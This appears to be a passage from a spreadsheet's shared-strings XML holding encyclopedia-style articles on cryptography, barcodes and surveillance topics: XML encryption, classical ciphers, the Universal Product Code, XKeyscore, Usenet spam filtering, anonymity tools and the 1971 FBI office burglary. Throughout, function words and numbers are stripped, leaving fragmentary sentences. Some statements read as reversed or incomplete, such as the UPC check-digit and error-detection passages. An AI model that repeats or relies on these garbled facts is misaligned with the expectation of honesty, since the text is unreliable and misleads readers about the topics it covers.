    <t>encryption, also known xml-enc, specification, governed recommendation, defines encrypt contents element. although encryption used encrypt kind data, nonetheless known "xml encryption" element (either encrypteddata encryptedkey element) contains refers cipher text, keying information, algorithms. both signature encryption keyinfo element, appears child signedinfo, encrypteddata, encryptedkey element provides information recipient keying material validating signature decrypting encrypted data. keyinfo element optional: attached message, delivered secure channel. encryption different unrelated transport layer security, used send encrypted messages (including content, encrypted otherwise) internet. reported specification severe security concerns. references external links info apache santuario apache security implementation java xmlsec security library introduction signature encryption xmlsec</t>
  </si>
  <si>
    <t>Alphabetum Kaldeorum</t>
  </si>
  <si>
    <t>alphabetum kaldeorum ("alphabet chaldeans") best known ciphers middle ages. name refers chaldea, whose inhabitants medieval reputed mysterious magical knowledge. found complete version, together non-latin alphabets, manuscript year 1428, library university munich (cod. 810, fol. 41v). however, origins clearly earlier time, examples practical demonstrate. alphabetum kaldeorum meant primarily encipherment diplomatic correspondence; alphabet implies predominantly latin texts coded: equated; written double missing. frequently arising letters alphabetum kaldeorum provides several different versions, used random decipherment attempt using classical frequency analysis method fail. "nulla", cipher-letters plaintext assignment ignored, also often added enciphered texts render frequency-analysis useless. possible author alphabetum kaldeorum duke rudolf austria (1339–1365), attributed indian origin them; letters alphabetum kaldeorum probably not, however, related writing common india, actually independent creations. even rudolf's gravestone stephansdom vienna carries inscription enciphered using alphabetum kaldeorum, gives names titles duke. external links media related alphabetum kaldeorum wikimedia commons</t>
  </si>
  <si>
    <t>Cleanfeed (Usenet spam filter)</t>
  </si>
  <si>
    <t>cleanfeed spam filter usenet news groups. well blocking spam, also able block binary image posts non-binary news groups html posts. acts looking repeated patterns duplicate messages, able identify known spamming sites domains. published artistic license. cleanfeed originally developed maintained jeremy nixon later marco d'itri, last formal update released 2001. beta release made available 2002 recommended version deploy. 2007 steve crook began producing series updates, initially designed counter hipcrime floods. later releases include number features patches. later developed pyclean, python equivalent cleanfeed. references</t>
  </si>
  <si>
    <t>Universal Product Code</t>
  </si>
  <si>
    <t>universal product code (upc code) barcode symbology widely used worldwide tracking trade items stores. (technically refers upc-a) consists digits uniquely assigned trade item. along related international article number (ean) barcode, barcode mainly used scanning trade items point sale, specifications international organisation. data structures component global trade item numbers (gtins) follow global specification, based international standards. retailers (clothing, furniture) system (rather barcode symbologies article number systems). hand, retailers ean/upc barcode symbology, without using gtin (for products sold stores only). research indicates adoption diffusion stimulated innovation contributed growth international retail supply chains. history wallace flint proposed automated checkout system 1932 using punched cards. bernard silver norman joseph woodland, graduate student drexel institute technology, developed bull's-eye-style code applied patent 1949.in 1960s early 1970s, railroads north america experimented multicolor codes tracking railcars, system eventually abandoned replaced radio-based system called automatic equipment identification (aei). 1973, group trade associations grocery industry formed uniform product code council (upcc) which, help consultants larry russell wilson mckinsey company, defined numerical format formed basis uniform product code. technology firms including charegon, ibm, litton-zellweger, pitney bowes-alpex, plessey-anker, rca, scanner inc., singer, dymo industries/data general, forward alternative proposals symbol representations council. symbol selection committee finally chose implement proposal designed george laurer, slight modification font human readable area.the first upc-marked item ever scanned retail checkout 10-pack sticks) wrigley's juicy fruit chewing gum, purchased marsh supermarket troy, ohio, 8:01 a.m. june 1974. cash register rang cents. shopping cart also contained barcoded items first picked checkout. facsimile packet went display smithsonian institution's american history museum washington, d.c.murray eden consultant team created universal product code barcode. chairman committee scientists massachusetts institute technology, helped "select symbol would endure inevitable rush technology ahead." chose font, came idea numbers bottom, fail-safe system, case barcode reader working correctly. proposal around late 1969, research triangle park (rtp) north carolina assigned george laurer determine make supermarket scanner label. late 1970, heard baumeister provided equations calculate characters-per-inch achievable codes, delta delta february, 1971, baumeister joined laurer. delta compared widths space width code bits. this extremely sensitive spread, improper levels pressure would cause edges spread outward shrink 1971, william "bill" crouse invented code called delta achieved four times characters inch delta delta achieved higher performance using leading leading trailing trailing edges unaffected uniform spread. code provided best performance defined character fixed reference distance spanned preferably character. august, 1971, crouse joined scanner effort. after several months made progress. they aware bull's label could scanned simple straight line laser scanner, readable label large. although litton industries proposed bull's symbol half reduce area, still large presented smear printing problems symbol. redundancy checking ability removed completely. they also aware many proposals around world, none feasible. spring 1972, baumeister announced breakthrough. proposed label bars slightly longer distance across bars needed read single pass. this label could scanned simple scanner slightly complex straight line laser scanner. next baumeister suggested label split halves lengths could nearly half. these proposals reduced area bull's third sixth. image right shows label proposed baumeister. specify specific code well understood. except coding digits label today proposal. shortly baumeister transferred another area rtp. laurer proceeded define details label write proposal. n.j. woodland assigned planner project aided laurer writing proposal. laurer's first attempt code used delta resulting label size inches three inches large. crouse suggested laurer delta code provided copy patent sample alphanumeric character rules generate size alphabets. this reduced label size 1.5” 0.9”. later laurer asked crouse assistance scanner could detect label. together defined guard bars definition detect label. guard bars also provided identification half label discrimination training bars scanner threshold circuits. laurer complete label definition proceeded write proposal.previously crouse idea simple wand worn like ring bracelet. decided develop wand provide demonstration label.on december 1972, presented laurer's proposal super market committee rochester, minnesota, location would develop scanner. during presentation, crouse gave demonstration read upc-like labels ring wand. addition reading regular labels, read large two-page centerfold label proposal booklet. turned page showing photo labeled items sitting table. labels small flawed resolution printed photo wand read many them. this demonstration showed robustness pure delta code. proposal accepted. month later, january 1973 crouse transferred back ibm's advanced technology group, laurer remained full responsibility label. dymo industries, makers handheld printing devices insisted code character independent, handheld printing devices could produce code store items bar-coded manufacturers. dymo's proposal accepted incorporated ibm's latest proposal. decided halves label different numeric characters. character laurer derived delta patent used seven printable increments units bars spaces would printed. this yielded twenty combinations characters, pairs read delta rules yielded code pair. since eighteen characters enough laurer tried adding unit character set. this yielded twenty-six delta characters could provide sets decimal characters also added fourteen percent width label thereby height. this would thirty percent increase area label 1.7”x1.03”. laurer felt acceptable. laurer returned original character twenty characters four pairs delta reading. decided all. distinguish pairs would measure width pairs distinguish other. pair bars would units wide. laurer apply baumeister's equations set. felt width measurement would serious. turned would required fifty percent increase width height area increase double. laurer later admitted four characters responsible scanner read errors. david savir, mathematician, given task proving symbol could printed would meet reliability requirements, likely unaware baumeister's equations. laurer added digits error correction detection. then decided odd/even parity number units filled bars side. odd/even parity technique used detect number errors stream. they decided half even other. this would provide additional indication half ticket read. this meant every width read accurately provide good reading. also meant every space would also known. requiring every width read precisely basically nullified delta advantage except delta reference measurement. only strange character size label remains shadow delta code. size still calculated pure delta label size properly recalculated, taking account required width measurements label would large acceptable. mechanical engineering electronic circuit design commonly require worst case designs using known tolerances. many engineers working codes little experience things used somewhat intuitive methods. this cause poor performance delta code quite likely failure rca's bull's scanner. following table shows workable labels, available early 1970s, sizes. this assuming bull's information reliable readability. composition each upc-a barcode consists scannable strip black bars white spaces sequence numerical digits. letters, characters content kind appear upc-a barcode. there one-to-one correspondence 12-digit number strip black bars white spaces, i.e. represent 12-digit number visually represent strip black bars white spaces numerically. scannable area every upc-a barcode follows pattern sllllllmrrrrrre, (start), (middle), (end) guard patterns represented every upc-a barcode (left) (right) sections collectively represent numerical digits make upc-a unique. first digit indicates particular number system used following digits. last digit error detecting check digit, allows errors detected scanning manual entry. guard patterns separate groups numerical digits establish timing. upc-a 042100005264 equivalent upc-e 425261 "eoeeoo" parity pattern, defined upc-a number system upc-a check digit formatting upc-a barcodes printed various densities accommodate variety printing scanning processes. significant dimensional parameter called x-dimension (width single module element). width (space) determined multiplying x-dimension module width units) (space). since guard patterns include bars, digits upc-a barcode consists bars spaces, upc-a barcodes consist exactly bars, represent guard patterns represent numerical digits. x-dimension upc-a nominal size 0.33 (0.013"). nominal symbol height upc-a 25.9 (1.02"). bars forming (start), (middle), (end) guard patterns, extended downwards times x-dimension, resulting nominal symbol height 27.55 (1.08"). this also applies bars first last numerical digit upc-a barcode. upc-a reduced magnified anywhere 200%. quiet zone, width least times x-dimension, must present side scannable area upc-a barcode. gtin-12 number encoded upc-a barcode, first last digits human-readable interpretation always placed outside symbol order indicate quiet zones necessary barcode scanners work properly. encoding upc-a barcode visually represented strips bars spaces encode upc-a 12-digit number. each digit represented unique pattern bars spaces. bars spaces variable width, i.e. modules wide. total width digit always modules; consequently, upc-a 12-digit number requires total 7×12 modules. complete upc-a modules wide: modules digits sections) combined modules (start), (middle), (end) guard patterns. (start) (end) guard patterns modules wide pattern bar-space-bar, space module wide. (middle) guard pattern modules wide uses pattern space-bar-space-bar-space, space also module wide. addition, upc-a symbol requires quiet zone (extra space modules wide) (start) (end) guard patterns. upc-a's left-hand side digits (the digits left (middle) guard pattern) parity, means total width black bars number modules. contrary, right-hand side digits even parity. consequently, scanner determine whether scanning symbol left-to-right right-to-left (the symbol upside-down). after seeing (start) (end) guard pattern (they same, bar-space-bar, whichever direction read), scanner first parity digits, scanning left-to-right, even parity digits, scanning right-to-left. with parity/direction information, upside-down symbol confuse scanner. when confronted upside-down symbol, scanner simply ignore (many scanners alternate left-to-right right-to-left scans, read symbol subsequent pass) recognize digits right order. there another property digit encoding. right-hand side digits optical inverse left-hand side digits, i.e. black bars turned white spaces vice versa. example, left-hand side space×1 bar×1 space×3 bar×2, meanwhile right-hand side bar×1 space×1 bar×3 space×2. numbering number upc-a upc-e barcodes limited standards used create them. upc-a: possible values left digit left digits) possible values right digit right digits) 100,000,000,000. upc-e: possible values digit digits) possible parity patterns upc-e number) 2,000,000. number system digit below description possible number systems corresponding 12-digit upc-a numbering schema llllllrrrrrr, denotes number system digit check digit. 0–1, products. lllll digits manufacturer code (assigned local organization), rrrrr digits product code. reserved local (store/warehouse), items sold variable weight. variable-weight items, meats, fresh fruits, vegetables, assigned item number store, packaged there. case, lllll item number, rrrrr either weight price, first determining weight). drugs national drug code (ndc) number. pharmaceuticals u.s. middle digits number. though usually over-the-counter drugs scanned point sale, ndc-based upcs used prescription drug packages surgical products and, case, commonly called codes. reserved local (store/warehouse), often loyalty cards store coupons. coupons. lllll digits digits product's prefix, next three family code (set manufacturer supplied coupon clearing house), next value code (according value code table), determines amount discount. these coupons doubled tripled. check digit calculation includes check digit detect common data entry errors. example, upc-a codes choose check digit {\displaystyle x_{12}} satisfy check digit equation: {\displaystyle (3x_{1}+x_{2}+3x_{3}+x_{4}+3x_{5}+x_{6}+3x_{7}+x_{8}+3x_{9}+x_{10}+3x_{11}+x_{12})\equiv 0{\pmod {10}}.} entered code satisfy equation, valid upc-a. upc-a check digit calculated follows: digits odd-numbered positions (first, third, fifth,..., eleventh). multiply result digit even-numbered positions (second, fourth, sixth,..., tenth) result. find result modulo (i.e. remainder, divided call zero, check digit otherwise check digit m.for example, upc-a barcode "03600029145x12", unknown check digit, calculated odd-numbered digits 14). multiply result 42). even-numbered digits 58). find result modulo subtract 2).thus, check digit check digit equation selected reasonable error detection properties (see luhn algorithm). upc-a detect 100% single digit errors. single digit error means exactly digit wrong. difference modulo erroneous digit correct digit value cannot zero means digits same, value error digit position (weight left hand side check digit equation changes equivalence longer zero. error digit even position (weight left hand side changes change also nonzero modulo check digit equation satisfied. upc-a detect transposition errors. specifically, difference adjacent digits upc-a can't detect transposition. neighboring digits transposed, digits weighted digit weighted difference digits. digits correct order, would contribute {\displaystyle 1a+3b=1a+3(a+d)=4a+3d} left hand side check digit equation. transposed order, contribute {\displaystyle 1b+3a=3a+1(a+d)=4a+d} lhs. subtracting contributions gives much change lhs: {\displaystyle (4a+3d)-(4a+d)=2d} error detected long modular change nonzero; modulo change detected. consequently, character difference error undetected (when degenerate "transposition" error). next consider often transposition distance 5.here table d-transpositions upc-a barcodes, {\displaystyle d\in \{0,1,2,\ldots ,9\}:} contains number d-transpositions, therefore proportion non-detectable transposition errors (ignoring transpositions 11.111 {\displaystyle {\frac {10}{18+16+14+12+10+8+6+4+2}}={\frac {10}{90}}=11.111\ldots \%.} variations common usage technically refers upc-a. other variants exist: upc-b 12-digit version check digit, developed national drug code (ndc) national health related items code. digits plus 1-digit product code, common use. upc-c 12-digit code product code check digit; common use. upc-d variable length code digits more) 12th digit check digit. these versions common use. upc-e 6-digit code, equivalent upc-a 12-digit code number system upc-2 2-digit supplement used indicate edition magazine periodical. upc-5 5-digit supplement used indicate suggested retail price books. upc-e allow barcodes smaller packages, full 12-digit barcode fit, zero-suppressed version developed, called upc-e, number system digit, trailing zeros manufacturer code, leading zeros product code, suppressed (omitted). this symbology differs upc-a uses 6-digit code, (middle) guard pattern, (end) guard pattern formed space-bar-space-bar-space-bar, i.e. upc-e barcode follows pattern sdddddde. 6-digit upc-e relates 12-digit upc-a, determined upc-e numerical pattern upc-e parity pattern. correspond upc-a number system value which, along upc-a check digit, determines upc-e parity pattern encoding. with manufacturer code digits represented m's, product code digits p's, then: example, upc-e 654321 correspond upc-a 065100004327 165100004324, depending upc-e parity pattern encoded digits, described next: upc-e 654321 "eoeoeo" parity pattern (upc-a 065100004327) would encoded 1-1-1 4-1-1-1 1-2-3-1 2-3-1-1 1-4-1-1 2-2-1-2 2-2-2-1 1-1-1-1-1-1. barcode would look like this: ean-13 ean-13 developed superset upc-a, adding extra digit beginning every upc-a number. this expanded number unique values theoretically possible times trillion. ean-13 barcodes also indicate country company sells product based (which country good manufactured). three leading digits code determine this, according country codes. every upc-a code easily converted equivalent ean-13 code prepending digit upc-a code. this change check digit. point-of-sale systems understand equally. ean-8 8-digit variation barcode. usage notes: products marked accepted north america currently, addition already marked upc. products existing re-marked ean. north america, adds codes, mainly adding digits digits this powerful incentive phase upc. also international supply-chain standards organization proof purchase references further reading 3832686, bilgutay, ilhan "bar code font", published 1972, issued august 1974 3145291, brainerd, "identification system", published july 1959, issued april 1964 railroad code. 3617707, shields, charles stapelfeldt, roelif, "automatic identification system", published august 1967, issued november 1971 3723710, crouse, william jones, john "method device reading decoding high density self-clocking code", published june 1971, issued march 1973 external links history history museum where history lives wayback machine (archived july 2019) upc-search.org free online database upcs company prefix three-digit prefix list indicating country origin company code (not necessarily country manufacture)</t>
  </si>
  <si>
    <t>Classical cipher</t>
  </si>
  <si>
    <t>cryptography, classical cipher type cipher used historically part, fallen disuse. contrast modern cryptographic algorithms, classical ciphers practically computed solved hand. however, also usually simple break modern technology. term includes simple systems used since greek roman times, elaborate renaissance ciphers, world cryptography enigma machine beyond. contrast, modern strong cryptography relies algorithms computers developed since 1970s. types classical ciphers classical ciphers often divided transposition ciphers substitution ciphers. substitution ciphers substitution cipher, letters groups letters) systematically replaced throughout message letters groups letters). well-known example substitution cipher caesar cipher. encrypt message caesar cipher, letter message replaced letter three positions later alphabet. hence, replaced etc. finally, replaced respectively. example, "wikipedia" encrypts "zlnlshgld". caesar rotated alphabet three letters, number works. another method substitution cipher based keyword. spaces repeated letters removed word phrase, encoder uses start cipher alphabet. cipher alphabet rest alphabet order without repeating letters keyword. example, keyword cipher, cipher alphabet would look like this: previous examples examples monoalphabetic substitution ciphers, cipher alphabet used. also possible polyalphabetic substitution cipher, multiple cipher alphabets used. encoder would make cipher alphabets using whatever techniques chooses, encode message, alternating cipher alphabet used every letter word. this makes message much harder decode codebreaker would figure cipher alphabets. another example polyalphabetic substitution cipher much difficult decode vigenère square, innovative encoding method. with square, different cipher alphabets used encrypt text. each cipher alphabet another rightward caesar shift original alphabet. this vigenère square looks like: vigenère square encrypt message, coder first chooses keyword repeats length message encoded. lemon keyword, letter repeated keyword tell cipher (what row) letter message coded. cipher alphabet second uses etc. that cipher alphabet 'b'. each cipher alphabet named first letter example, keyword lemon message encode attackatdawn, encoding some substitution ciphers involve using numbers instead letters. example great cipher, numbers used represent syllables. there also another number substitution cipher involves four different number pair options letter based keyword. instead numbers, symbols also used replace letters syllables. example zodiac alphabet, signs zodiac used represent different letters, example, symbols stood jupiter stood saturn stood dots, lines, dashes could also used, example morse code, cipher, uses dots dashes letters nonetheless. pigpen cipher uses grid system lines dots establish symbols letters. there various methods involve substituting letters alphabet symbols dots dashes. transposition ciphers transposition cipher, letters kept unchanged, order within message scrambled according well-defined scheme. many transposition ciphers done according geometric design. simple (and easy crack) encryption would write every word backwards. example, "hello name alice." would "olleh eman ecila." scytale machine aids transposition methods. columnar cipher, original message arranged rectangle, left right bottom. next, chosen used assign number column rectangle determine order rearrangement. number corresponding letters determined place alphabet, i.e. etc. example, word message blue, message would arranged thus: next, letters taken numerical order message transposed. column taken first, column column result message "the blue" become: hksutsileybe chinese cipher's method transposing, letters message written right left, columns scramble letters. then, starting first row, letters taken order ciphertext. example, message needed enciphered far, chinese cipher would look like this: cipher text reads: rrgt aaoh fnde many transposition ciphers similar examples, usually involving rearranging letters rows columns taking systematic transpose letters. other examples include vertical parallel double transposition cipher. more complex algorithms formed mixing substitution transposition product cipher; modern block ciphers iterate several stages substitution transposition. cryptanalysis classical ciphers classical ciphers commonly quite easy break. many classical ciphers broken even attacker knows sufficient ciphertext hence susceptible ciphertext-only attack. some classical ciphers (e.g., caesar cipher) small space. these ciphers broken brute force attack, simply trying keys. substitution ciphers large space, often susceptible frequency analysis, example frequent letters plaintext language correspond frequent letters ciphertexts. polyalphabetic ciphers vigenère cipher prevent simple frequency analysis using multiple substitutions. however, advanced techniques kasiski examination still used break ciphers. hand, modern ciphers designed withstand much stronger attacks ciphertext-only attacks. good modern cipher must secure wide range potential attacks including known-plaintext attacks chosen-plaintext attacks well chosen-ciphertext attacks. ciphers attacker able find even knows amount plaintext corresponding ciphertext even could select plaintext ciphertext himself. classical ciphers satisfy much stronger criteria hence longer interest serious applications. some techniques classical ciphers used strengthen modern ciphers. example, mixcolumns step hill cipher. also history cryptography references hand ciphers pencil-and-paper ciphers ciphermachines cryptology trinity college department computer science: historical cryptography information many different types encryption algorithms including substitution transposition ciphers singh, simon. code book: science secrecy ancient egypt quantum cryptography. york: anchor, 2000. d'agapeyeff, alexander. codes ciphers. oxford 1939. william friedman. american army field codes american expeditionary forces during first world war, u.s. department, june 1942 laffin, john. codes ciphers: secret writing ages. abelard-schuman, 1964. wrixon, fred codes, ciphers, secret languages. york: bonanza books, 1989.</t>
  </si>
  <si>
    <t>XKeyscore</t>
  </si>
  <si>
    <t>xkeyscore (xkeyscore xks) secret computer system used united states national security agency (nsa) searching analyzing global internet data, collects real time. shared xkeyscore intelligence agencies, including australian signals directorate, canada's communications security establishment, zealand's government communications security bureau, britain's government communications headquarters, japan's defense intelligence headquarters, germany's bundesnachrichtendienst.in july 2013, edward snowden publicly revealed program's purpose sydney morning herald globo newspapers. code name already public knowledge mentioned earlier articles, and, like many code names, appears postings online résumés employees.on july 2014, german public broadcaster norddeutscher rundfunk, member ard, published excerpts xkeyscore's source code. team experts analyzed source code. scope functioning xkeyscore complicated system, various authors different interpretations actual capabilities. edward snowden glenn greenwald explained xkeyscore system enables almost unlimited surveillance anyone anywhere world, said usage system limited restricted. according washington post national security reporter marc ambinder, xkeyscore data-retrieval system consists series user interfaces, backend databases, servers software selects certain types data metadata already collected using methods. according snowden greenwald january 2014, german broadcaster norddeutscher rundfunk asked edward snowden interview: "what could would xkeyscore?" answered: could read anyone's email world, anybody email address for. website: watch traffic computer individual sits watch laptop tracking: follow moves place place throughout world. it's one-stop-shop access nsa's information. individuals let's work major german corporation want access network, track username website forum somewhere, track real name, track associations friends build what's called fingerprint, network activity unique you, means anywhere world, anywhere sort hide online presence, identity. according guardian's glenn greenwald, low-level analysts can, systems like xkeyscore, "listen whatever emails want, whatever telephone calls, browsing histories, microsoft word documents. done need court, need even supervisor approval part analyst."he added nsa's database collected communications allows analysts listen calls read emails everything stored, look browsing histories google search terms entered, also alerts activity people connected email address address future". according official statement july 2013, said "xkeyscore used part nsa's lawful foreign signals intelligence collection system. ..." legally obtain information "legitimate foreign intelligence targets response requirements leaders need information necessary protect nation interests. collect information, enables perform missions successfully defend nation protect u.s. allied troops abroad." terms access, press statement reads "unchecked analyst access collection data. access xkeyscore, well nsa's analytic tools, limited personnel require access assigned tasks." "...stringent oversight compliance mechanisms built several levels. feature system's ability limit analyst tool, based source collection analyst's defined responsibilities." workings according slide presentation xkeyscore 2013, "dni exploitation system/analytic framework". stands digital network intelligence, means intelligence derived internet traffic.edward snowden said xkeyscore: "it's front search engine" interview german norddeutscher rundfunk.xkeyscore "piece linux software typically deployed servers. uses apache server stores collected data mysql databases".xkeyscore considered "passive" program, listens, transmit anything networks targets. trigger systems, perform "active" attacks tailored access operations "tipping", example, quantum family programs, including quantuminsert, quantumhand, quantumtheory, quantumbot quantumcopper turbulence. these so-called "defensive sites" including ramstein force base germany, yokota base japan, numerous military non-military locations within trafficthief, core program turbulence, alert analysts targets communicate, trigger software programs, select data "promoted" local xkeyscore data store nsa's "corporate repositories" long term storage. data sources xkeyscore consists servers approximately sites collects data, like allied military facilities well embassies consulates" many countries around world. among facilities involved program four bases australia zealand.according presentation 2008, xkeyscore servers data following collection systems: (special collection service) joint operation carries clandestine operations including espionage foreign diplomats leaders fornsat stands "foreign satellite collection", refers intercepts satellites (special source operations) division cooperates telecommunication providersin single, undated slide published swedish media december 2013, following additional data sources xkeyscore mentioned: overhead intelligence derived american planes, drones satellites tailored access operations division deals hacking cyberwarfare fisa types surveillance approved foreign intelligence surveillance court third party foreign partners (signals) intelligence agencies belgium, denmark, france, germany, italy, japan, netherlands, norway, sweden, etc. however netherlands cooperation concerning intelligence gathering sharing illegal spying.from sources, xkeyscore stores "full-take data", indexed plug-ins extract certain types metadata (like phone numbers, e-mail addresses, log-ins, user activity) index metadata tables, queried analysts. xkeyscore integrated marina, nsa's database internet metadata.however, system continuously gets much internet data stored short periods time. content data remain system three five days, metadata stored thirty days. detailed commentary presentation published guardian july 2013 cites document published 2008 declaring sites, amount data receive (20+ terabytes) stored little hours." types xkeyscore according document internal gchq website disclosed german magazine spiegel june 2014, three different types xkeyscore system: traditional: initial version xkeyscore data low-rate data signals, processed wealthycluster system. this traditional version used also many intercept sites gchq. stage this version xkeyscore used higher data rates. data first processed turmoil system, sends internet data packets xkeyscore. gchq uses version collection muscular program. deep dive: this latest version process internet traffic data rates gigabits second. data could useful intelligence purposes selected forwarded using "genesis selection language". gchq also operates number deep dive versions xkeyscore three locations codename tempora. capabilities analysts, xkeyscore provides "series viewers common data types", allows query terabytes data gathered aforementioned collection sites. this enables find targets cannot found searching metadata, also data sets otherwise would dropped front-end data processing systems. according slide xkeyscore presentation, collection sites select forward less internet traffic pinwale database internet content.because xkeyscore holds unselected communications traffic, analysts perform queries using "strong selectors" like e-mail addresses, also using "soft selectors", like keywords, body texts e-mail chat messages digital documents spreadsheets english, arabic chinese.this useful large amount time spent performing actions anonymous" therefore activities can't found looking e-mail addresses target. when content found, analyst might able find intelligence strong selector, used starting traditional search.besides using soft selectors, analysts also following xkeyscore capabilities: look usage google maps terms entered search engine known targets looking suspicious things places. look "anomalies" without specific person attached, like detecting nationality foreigners analyzing language used within intercepted emails. example would german speaker pakistan. brazilian paper globo claims applied latin america specifically colombia, ecuador, mexico venezuela. detect people encryption searches like "all usage iran". caveat given broad queries result much data transmit back analyst. showing usage virtual private networks (vpns) machines potentially hacked tao. track source authorship document passed many hands. july 2014 revealed xkeyscore used closely monitor users anonymity network, people search privacy-enhancing software web, readers linux journal.the guardian revealed 2013 things cannot detected tools, operate strong selectors (like e-mail addresses phone numbers) data volumes high forwarded databases.in 2008, planned number capabilities future, like voip, networking protocols, exif tags, often include geolocation (gps) data. contribution u.s. security slides published guardian 2013 claimed xkeyscore played role capturing terrorists 2008, could substantiated redacted documents cite instances terrorist interventions. 2011 report unit dagger complex (close griesheim germany) said xkeyscore made easier efficient target surveillance. previously, analysis often accessed data interested xkeyscore allowed focus intended topics, ignoring unrelated data. xkeyscore also proved outstanding tracking active groups associated anonymous movement germany, allows searching patterns, rather particular individuals. analyst able determine targets research topics, develop behaviors.to create additional motivation, incorporated various gamification features. instance, analysts especially good using xkeyscore could acquire "skilz" points "unlock achievements." training units griesheim apparently successful analysts achieved "highest average skilz points" compared departments participating training program. usage foreign partners germany according documents spiegel acquired snowden, german intelligence agencies (foreign intelligence) (domestic intelligence) also allowed xkeyscore system. documents agency described nsa's prolific partner information gathering. this political confrontations, directors german intelligence agencies briefed members german parliamentary intelligence oversight committee july 2013. they declared xkeyscore used since 2007 using test version since 2012. directors also explained program collecting data, rather analysis collected data. sweden part ukusa agreement, secret treaty signed 1954 sweden united states, united kingdom, canada, australia zealand (called five eyes) purpose intelligence collaboration data sharing. according documents leaked snowden, national defence radio establishment (fra) granted access xkeyscore. denmark ongoing scandal, revealed helped (danish military intelligence service) build datacenter sandagergård, amager, xkeyscore made available collected data. japan classified documents leaked snowden also indicate april 2013, secretly provided xkeyscore system japanese government. also list government surveillance projects prism file:xkeyscore presentation 2008.pdf, redacted presentation x-keyscore guardian (uk) edward snowden u.s. national security agency targeted surveillance references external links full presentation xkeyscore 2008 building panopticon: evolution nsa’s xkeyscore marquis-boire, morgan; greenwald, glenn; lee, micah (july 2015). "xkeyscore: nsa's google world's private communications". intercept. retrieved july 2015. lee, micah; greenwald, glenn; marquis-boire, morgan (july 2015). "behind curtain; look inner workings nsa's xkeyscore". intercept. retrieved july 2015.</t>
  </si>
  <si>
    <t>Alt.sex.cancel</t>
  </si>
  <si>
    <t>alt.sex usenet newsgroup discussion group within usenet network relating human sexual activity. popular 1990s. october 1993 survey brian reid reported estimated worldwide readership alt.sex newsgroup million, total usenet readership, usenet "nodes" (news servers users access system) carrying group. time, alt.sex estimated traffic 2,300 messages month.the newsgroup hierarchy alt.sex comprises several newsgroups, including alt.sex.stories (which biggest newsgroup hierarchy alt.sex itself), alt.sex.pictures, alt.sex.blondes, alt.sex.bondage, alt.sex.bestiality, alt.sex.rape. former four newsgroups generally feature text images similar type found mainstream adult magazines, playboy penthouse. latter three newsgroups exemplify sub-groups deals "extreme" less socially accepted topics. other sub-groups include intentionally humorous names, alt.sex.aluminum.baseball.bat, alt.sex.boredom, alt.sex.bestiality.hamster.duct-tape. there newsgroups less mainstream topics sub-cultures, although 1998 generally lower traffic deal mainstream sexual behaviours. 1993 analysis alt.sex hierarchy, maureen furniss concluded "sexually oriented boards kind support group people post notices them, especially individuals whose sexual orientations marginalized (those practice sadomasochism bestiality, example)."the first usenet bdsm newsgroup, alt.sex.bondage, created 1991. term bdsm first recorded post alt.sex.bondage 1991.the university waterloo 1994 ceased carrying alt.sex.bondage, alt.sex.bestiality, alt.sex-stories, alt.sex-stories.d upon recommendation ethics committee, expressed concerns content newsgroups violated canadian criminal code.alt.sex.cancel usenet newsgroup specifically help combat newsgroup spam cross-posted entire alt.sex hierarchy. newsgroup simple "spamtrap" trap used collect samples unsolicited messages acted automated anti-spam system. according charter, message posted alt.sex.cancel cancelled automatically.the well-known mass-mailing macro computer virus called "melissa virus" originally distributed alt.sex newsgroup. hidden inside list purporting contain passwords pornographic websites. messages containing virus posted message headers claiming post written using america online (aol) account scott steinmetz, whose username "skyroket". kizza reports headers post probably forged melissa's author, david smith. references further reading brian reid (1993). "usenet readership summary report". palo alto, california: network measurement project western research laboratory. {{cite journal}}: cite journal requires |journal= (help) maureen furniss (1993). "sex hard (disk) computer bulletin boards pornography". wide angle. (2): 19–37. external links alt.sex newsgroup faqs alt.sex.bondage group google</t>
  </si>
  <si>
    <t>Unode</t>
  </si>
  <si>
    <t>unode short form underground node: script program combines programs creating decentralized anonymous encrypted communication network. other programs include: entropy, mixmaster, gpg, newspost, plus plugins more. unode project create bash scripts help activists communicate without revealing personal data. some scripts used forward email lists newsgroup alt.activism.underground. this, activists read important action alerts information without included servers email lists lists. email headers removed posts, well email addresses altered help avoid spam. unix bash scripts used easy alter correct errors scripts, easy ideas. used rough draft, eventual move stable binary programs. external links http://newspost.unixcab.org/ http://www.freelists.org/list/unode http://unode.8m.com</t>
  </si>
  <si>
    <t>XB Browser</t>
  </si>
  <si>
    <t>browser (formerly known torpark xerobank browser) browser designed xerobank anonymity networks, available component machine installer. designed portable media flash drive, also used hard disk drive. such, secure encrypted connection xerobank routers created computer suitable internet connection, browser clears data created portable drive upon exit demand.in march 2007 reported browser downloaded million times february 2008 million downloads making browser popular anonymous browser internet. history steve topletz co-released torpark v.1.5.0.7 cult dead cow/hacktivismo september 2006 year development based portable firefox browser built support using nullsoft scriptable install system. 2007 redesigned scratch.a cross-compatible version linux developed based machine, available august 2008, development seems abandoned. network usage network browser routes internet traffic several onion servers, obscuring originating address encrypting data. other applications pidgin routed network browser directing applications' traffic socks proxy localhost, port 9050. this port changed config, generator browser. xerobank network browser optimized xerobank anonymity network, private commercial broadband network operated xero networks xerobank network routes traffic least multi-jurisdictional hops. contrast tor, xerobank network supports protocols, performs channel multiplexing observability, single entity costs money use. xerobank network accessible openvpn protocols. browser internally manages connection xerobank, recognize submit openvpn connections. features besides anonymous networks, browser uses following add-ons: adblock plus, cookies flash cookies removal, browser history clearing closing references</t>
  </si>
  <si>
    <t>Citizens' Commission to Investigate the FBI</t>
  </si>
  <si>
    <t>citizens' commission investigate activist group operational early 1970s. their known action breaking two-man media, pennsylvania, office federal bureau investigation (fbi) stealing 1,000 classified documents. they mailed documents anonymously several newspapers expose numerous illegal operations infringing first amendment rights american civilians. most news outlets initially refused publish information, saying related ongoing operations disclosure might threatened lives agents informants. however, washington post, affirming veracity files commission sent them, front-page story march 1971, point media organizations followed suit. "the complete collection political documents ripped f.b.i. office media, pa., march 1971" published first time march 1972 issue magazine, journal associated resisters league. documents revealed cointelpro operation, church committee cessation operation fbi. noam chomsky stated: according analysis documents office, percent devoted organized crime, mostly gambling; percent "manuals, routine forms, similar procedural matter"; percent devoted political surveillance like, including cases involving right-wing groups, concerning immigrants, left liberal groups. another percent documents concerned draft resistance "leaving military without government permission." remainder concerned bank robberies, murder, rape, interstate theft. theft resulted exposure fbi's self-incriminating documents, including several documents detailing fbi's postal workers, switchboard operators, etc., order black college students various non-violent black activist groups. some years successful infiltration, perpetrators decided public. 2014, betty medsger's book burglary: discovery edgar hoover's secret f.b.i. released, contains burglars' description burglary revealed identities five eight burglars. filmmaker johanna hamilton also made documentary titled 